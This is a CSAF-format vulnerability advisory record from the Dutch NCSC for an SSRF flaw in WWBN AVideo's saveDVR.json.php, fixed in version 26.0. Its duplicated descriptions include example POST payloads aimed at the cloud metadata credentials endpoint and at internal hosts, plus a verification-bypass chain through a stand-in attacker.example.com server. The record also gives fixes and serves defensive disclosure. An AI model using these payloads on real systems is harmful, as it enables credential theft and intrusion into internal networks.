{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use of, or inability to use, the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33351",
        "tracking": {
            "current_release_date": "2026-03-26T00:48:02.920359Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33351",
            "initial_release_date": "2026-03-21T01:08:19.462578Z",
            "revision_history": [
                {
                    "date": "2026-03-21T01:08:19.462578Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-21T01:08:22.304159Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-23T17:30:22.374601Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-23T17:30:25.143682Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-23T18:12:43.301757Z",
                    "number": "5",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-23T18:12:45.962028Z",
                    "number": "6",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T02:21:07.803285Z",
                    "number": "7",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-24T02:21:12.771567Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-24T14:25:35.648445Z",
                    "number": "9",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T21:37:35.093796Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-24T21:37:36.907416Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T20:10:39.367035Z",
                    "number": "12",
                    "summary": "References created (2)."
                },
                {
                    "date": "2026-03-25T20:10:45.266432Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:46:48.893477Z",
                    "number": "14",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (3).| CWES updated (1)."
                }
            ],
            "status": "interim",
            "version": "14"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<26.0",
                                "product": {
                                    "name": "vers:unknown/<26.0",
                                    "product_id": "CSAFPID-5874460",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "AVideo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.4",
                                "product": {
                                    "name": "vers:unknown/10.4",
                                    "product_id": "CSAFPID-5656122",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/10.8",
                                "product": {
                                    "name": "vers:unknown/10.8",
                                    "product_id": "CSAFPID-5656123",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@10.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11",
                                "product": {
                                    "name": "vers:unknown/11",
                                    "product_id": "CSAFPID-5656124",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1",
                                "product": {
                                    "name": "vers:unknown/11.1",
                                    "product_id": "CSAFPID-5656125",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.1.1",
                                "product": {
                                    "name": "vers:unknown/11.1.1",
                                    "product_id": "CSAFPID-5656126",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.5",
                                "product": {
                                    "name": "vers:unknown/11.5",
                                    "product_id": "CSAFPID-5656127",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/11.6",
                                "product": {
                                    "name": "vers:unknown/11.6",
                                    "product_id": "CSAFPID-5656128",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@11.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/12.4",
                                "product": {
                                    "name": "vers:unknown/12.4",
                                    "product_id": "CSAFPID-5656129",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@12.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3",
                                "product": {
                                    "name": "vers:unknown/14.3",
                                    "product_id": "CSAFPID-5656130",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.3.1",
                                "product": {
                                    "name": "vers:unknown/14.3.1",
                                    "product_id": "CSAFPID-5656131",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/14.4",
                                "product": {
                                    "name": "vers:unknown/14.4",
                                    "product_id": "CSAFPID-5656132",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@14.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/18.0",
                                "product": {
                                    "name": "vers:unknown/18.0",
                                    "product_id": "CSAFPID-5656133",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@18.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/21.0",
                                "product": {
                                    "name": "vers:unknown/21.0",
                                    "product_id": "CSAFPID-5721197",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@21.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/22.0",
                                "product": {
                                    "name": "vers:unknown/22.0",
                                    "product_id": "CSAFPID-5772271",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@22.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/24.0",
                                "product": {
                                    "name": "vers:unknown/24.0",
                                    "product_id": "CSAFPID-5772272",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@24.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/25.0",
                                "product": {
                                    "name": "vers:unknown/25.0",
                                    "product_id": "CSAFPID-5840723",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@25.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/26.0",
                                "product": {
                                    "name": "vers:unknown/26.0",
                                    "product_id": "CSAFPID-5878928",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/wwbn/avideo@26.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<=26.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<=26.0",
                                    "product_id": "CSAFPID-5878929"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "avideo"
                    }
                ],
                "category": "vendor",
                "name": "WWBN"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33351",
            "cwe": {
                "id": "CWE-918",
                "name": "Server-Side Request Forgery (SSRF)"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed.\n\n### Affected Component\n\n**File:** `plugin/Live/standAloneFiles/saveDVR.json.php`, lines 5-28\n\n```php\n$streamerURL = \"\"; // change it to your streamer URL\n\n$configFile = '../../../videos/configuration.php';\nif (file_exists($configFile)) {\n    include_once $configFile;\n    $streamerURL = $global['webSiteRootURL'];\n}\n\nif (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n    $streamerURL = $_REQUEST['webSiteRootURL'];   // ATTACKER-CONTROLLED\n}\n\n// ...\n\n$verifyURL = \"{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}\";\n$result = file_get_contents($verifyURL);           // SSRF\n```\n\n### Root Cause\n\n1. **User-controlled URL base:** When the configuration file does not exist (standalone deployment), `$streamerURL` is set directly from `$_REQUEST['webSiteRootURL']` with no validation.\n2. **No URL allowlisting or scheme restriction:** The value is used as-is in a `file_get_contents()` call. There is no check for `http`/`https` scheme only, no private IP blocking, and no domain allowlist.\n3. **Verification bypass by design:** The token verification URL is constructed using the attacker-controlled base URL. The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.\n\n### Exploitation\n\n#### Part 1: Basic SSRF (Internal Network Access)\n\n```\nPOST /plugin/Live/standAloneFiles/saveDVR.json.php\nContent-Type: application/x-www-form-urlencoded\n\nwebSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anything\n```\n\nThe server fetches:\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anything\n```\n\nWhile the appended path may cause a 404 on the metadata service, the attacker can also use this for:\n- **Internal port scanning:** `webSiteRootURL=http://192.168.1.X:PORT/` — differentiate open/closed ports by response time and error messages.\n- **Internal service access:** `webSiteRootURL=http://internal-service/` — reach services behind the firewall.\n- **Cloud metadata access:** With URL path manipulation or by hosting a redirect on the attacker server.\n\n#### Part 2: Verification Bypass + Downstream Command Execution Chain\n\nThis is the more severe attack chain:\n\n1. The attacker sets up a server at `https://attacker.example.com/` with the path:\n   ```\n   /plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php\n   ```\n   That returns:\n   ```json\n   {\"error\": false, \"response\": {\"key\": \"attacker_controlled_value\"}}\n   ```\n\n2. The attacker sends:\n   ```\n   POST /plugin/Live/standAloneFiles/saveDVR.json.php\n\n   webSiteRootURL=https://attacker.example.com/&saveDVR=anything\n   ```\n\n3. The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.\n\n4. The `key` value from the response flows into shell commands:\n   - **Line 55:** `$DVRFile = \"{$hls_path}{$key}\";` — used in `exec()` at line 80 (though `escapeshellarg()` is applied to the path components)\n   - **Line 72:** `$DVRFileTarget = \"{$tmpDVRDir}\" . DIRECTORY_SEPARATOR . \"{$key}.m3u8\";` — used **without** `escapeshellarg()` in:\n     - Line 119: `exec(\"echo \\\"{$endLine}\\\" >> {$DVRFileTarget}\");`\n     - Line 157: `exec(\"ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y\");`\n     - Line 167: `exec(\"rm -R {$tmpDVRDir}\");`\n\n   The `$key` is sanitized at line 47 with `preg_replace(\"/[^0-9a-z_:-]/i\", \"\", $key)`, which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:\n   - The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.\n   - The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.\n   - The colon character (`:`) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.\n\n### Impact\n\n- **SSRF:** The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.\n- **Authentication Bypass:** The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.\n- **Potential Command Execution:** While the regex on `$key` limits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment.\n- **Information Disclosure:** Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.\n\n### Suggested Fix\n\n1. **Remove the user-controlled `webSiteRootURL` fallback entirely.** Require `$streamerURL` to be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:\n\n   ```php\n   // Remove this block:\n   // if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n   //     $streamerURL = $_REQUEST['webSiteRootURL'];\n   // }\n\n   // If $streamerURL is still empty, abort:\n   if (empty($streamerURL)) {\n       error_log(\"saveDVR: streamerURL is not configured\");\n       die('saveDVR: Server not configured');\n   }\n   ```\n\n2. **If the parameter must remain for backward compatibility**, validate it:\n   ```php\n   if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n       $url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);\n       if ($url && preg_match('/^https?:\\/\\//i', $url)) {\n           // Resolve hostname and block private/reserved IPs\n           $host = parse_url($url, PHP_URL_HOST);\n           $ip = gethostbyname($host);\n           if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n               die('saveDVR: Invalid URL');\n           }\n           $streamerURL = $url;\n       }\n   }\n   ```\n\n3. **Apply `escapeshellarg()` to all variables used in `exec()` calls**, including `$DVRFileTarget` at lines 119, 157, and `$tmpDVRDir` at line 167.",
                    "title": "github - https://api.github.com/advisories/GHSA-5f7v-4f6g-74rj"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, a Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed. Version 26.0 contains a patch for the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33351"
                },
                {
                    "category": "description",
                    "text": "WWBN AVideo is an open source video platform. Prior to version 26.0, a Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed. Version 26.0 contains a patch for the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33351.json"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability exists in `plugin/Live/standAloneFiles/saveDVR.json.php`. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the `$_REQUEST['webSiteRootURL']` parameter is used directly to construct a URL that is fetched server-side via `file_get_contents()`. No authentication, origin validation, or URL allowlisting is performed.\n\n### Affected Component\n\n**File:** `plugin/Live/standAloneFiles/saveDVR.json.php`, lines 5-28\n\n```php\n$streamerURL = \"\"; // change it to your streamer URL\n\n$configFile = '../../../videos/configuration.php';\nif (file_exists($configFile)) {\n    include_once $configFile;\n    $streamerURL = $global['webSiteRootURL'];\n}\n\nif (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n    $streamerURL = $_REQUEST['webSiteRootURL'];   // ATTACKER-CONTROLLED\n}\n\n// ...\n\n$verifyURL = \"{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}\";\n$result = file_get_contents($verifyURL);           // SSRF\n```\n\n### Root Cause\n\n1. **User-controlled URL base:** When the configuration file does not exist (standalone deployment), `$streamerURL` is set directly from `$_REQUEST['webSiteRootURL']` with no validation.\n2. **No URL allowlisting or scheme restriction:** The value is used as-is in a `file_get_contents()` call. There is no check for `http`/`https` scheme only, no private IP blocking, and no domain allowlist.\n3. **Verification bypass by design:** The token verification URL is constructed using the attacker-controlled base URL. 
The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.\n\n### Exploitation\n\n#### Part 1: Basic SSRF (Internal Network Access)\n\n```\nPOST /plugin/Live/standAloneFiles/saveDVR.json.php\nContent-Type: application/x-www-form-urlencoded\n\nwebSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anything\n```\n\nThe server fetches:\n```\nhttp://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anything\n```\n\nWhile the appended path may cause a 404 on the metadata service, the attacker can also use this for:\n- **Internal port scanning:** `webSiteRootURL=http://192.168.1.X:PORT/` — differentiate open/closed ports by response time and error messages.\n- **Internal service access:** `webSiteRootURL=http://internal-service/` — reach services behind the firewall.\n- **Cloud metadata access:** With URL path manipulation or by hosting a redirect on the attacker server.\n\n#### Part 2: Verification Bypass + Downstream Command Execution Chain\n\nThis is the more severe attack chain:\n\n1. The attacker sets up a server at `https://attacker.example.com/` with the path:\n   ```\n   /plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php\n   ```\n   That returns:\n   ```json\n   {\"error\": false, \"response\": {\"key\": \"attacker_controlled_value\"}}\n   ```\n\n2. The attacker sends:\n   ```\n   POST /plugin/Live/standAloneFiles/saveDVR.json.php\n\n   webSiteRootURL=https://attacker.example.com/&saveDVR=anything\n   ```\n\n3. The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.\n\n4. 
The `key` value from the response flows into shell commands:\n   - **Line 55:** `$DVRFile = \"{$hls_path}{$key}\";` — used in `exec()` at line 80 (though `escapeshellarg()` is applied to the path components)\n   - **Line 72:** `$DVRFileTarget = \"{$tmpDVRDir}\" . DIRECTORY_SEPARATOR . \"{$key}.m3u8\";` — used **without** `escapeshellarg()` in:\n     - Line 119: `exec(\"echo \\\"{$endLine}\\\" >> {$DVRFileTarget}\");`\n     - Line 157: `exec(\"ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y\");`\n     - Line 167: `exec(\"rm -R {$tmpDVRDir}\");`\n\n   The `$key` is sanitized at line 47 with `preg_replace(\"/[^0-9a-z_:-]/i\", \"\", $key)`, which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:\n   - The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.\n   - The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.\n   - The colon character (`:`) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.\n\n### Impact\n\n- **SSRF:** The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.\n- **Authentication Bypass:** The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.\n- **Potential Command Execution:** While the regex on `$key` limits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment.\n- **Information Disclosure:** Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.\n\n### Suggested Fix\n\n1. 
**Remove the user-controlled `webSiteRootURL` fallback entirely.** Require `$streamerURL` to be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:\n\n   ```php\n   // Remove this block:\n   // if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n   //     $streamerURL = $_REQUEST['webSiteRootURL'];\n   // }\n\n   // If $streamerURL is still empty, abort:\n   if (empty($streamerURL)) {\n       error_log(\"saveDVR: streamerURL is not configured\");\n       die('saveDVR: Server not configured');\n   }\n   ```\n\n2. **If the parameter must remain for backward compatibility**, validate it:\n   ```php\n   if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {\n       $url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);\n       if ($url && preg_match('/^https?:\\/\\//i', $url)) {\n           // Resolve hostname and block private/reserved IPs\n           $host = parse_url($url, PHP_URL_HOST);\n           $ip = gethostbyname($host);\n           if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {\n               die('saveDVR: Invalid URL');\n           }\n           $streamerURL = $url;\n       }\n   }\n   ```\n\n   Note that this check resolves the hostname once, before the fetch, while the fetch itself resolves the name again and may follow redirects (the redirect case is the one described in Part 1); the same private/reserved-range check therefore needs to be applied to the address actually connected to and to any redirect target, or redirects must be disabled for this request.\n\n3. **Apply `escapeshellarg()` to all variables used in `exec()` calls**, including `$DVRFileTarget` at lines 119, 157, and `$tmpDVRDir` at line 167.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-5f7v-4f6g-74rj.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00069",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.5",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Is related to (a version of) an uncommon product, The value of the most recent EPSS score, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5874460",
                    "CSAFPID-5656122",
                    "CSAFPID-5656123",
                    "CSAFPID-5656124",
                    "CSAFPID-5656125",
                    "CSAFPID-5656126",
                    "CSAFPID-5656127",
                    "CSAFPID-5656128",
                    "CSAFPID-5656129",
                    "CSAFPID-5656130",
                    "CSAFPID-5656131",
                    "CSAFPID-5656132",
                    "CSAFPID-5656133",
                    "CSAFPID-5721197",
                    "CSAFPID-5772271",
                    "CSAFPID-5772272",
                    "CSAFPID-5840723",
                    "CSAFPID-5878928",
                    "CSAFPID-5878929"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-5f7v-4f6g-74rj"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33351"
                },
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33351.json"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-5f7v-4f6g-74rj.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-5f7v-4f6g-74rj"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-5f7v-4f6g-74rj"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/WWBN/AVideo/commit/d0c54960389eeb85e76caed5a257ae90e6a739f2"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33351"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
                        "baseScore": 9.1,
                        "baseSeverity": "CRITICAL"
                    },
                    "products": [
                        "CSAFPID-5656122",
                        "CSAFPID-5656123",
                        "CSAFPID-5656124",
                        "CSAFPID-5656125",
                        "CSAFPID-5656126",
                        "CSAFPID-5656127",
                        "CSAFPID-5656128",
                        "CSAFPID-5656129",
                        "CSAFPID-5656130",
                        "CSAFPID-5656131",
                        "CSAFPID-5656132",
                        "CSAFPID-5656133",
                        "CSAFPID-5721197",
                        "CSAFPID-5772271",
                        "CSAFPID-5772272",
                        "CSAFPID-5840723",
                        "CSAFPID-5874460",
                        "CSAFPID-5878928",
                        "CSAFPID-5878929"
                    ]
                }
            ],
            "title": "CVE-2026-33351"
        }
    ]
}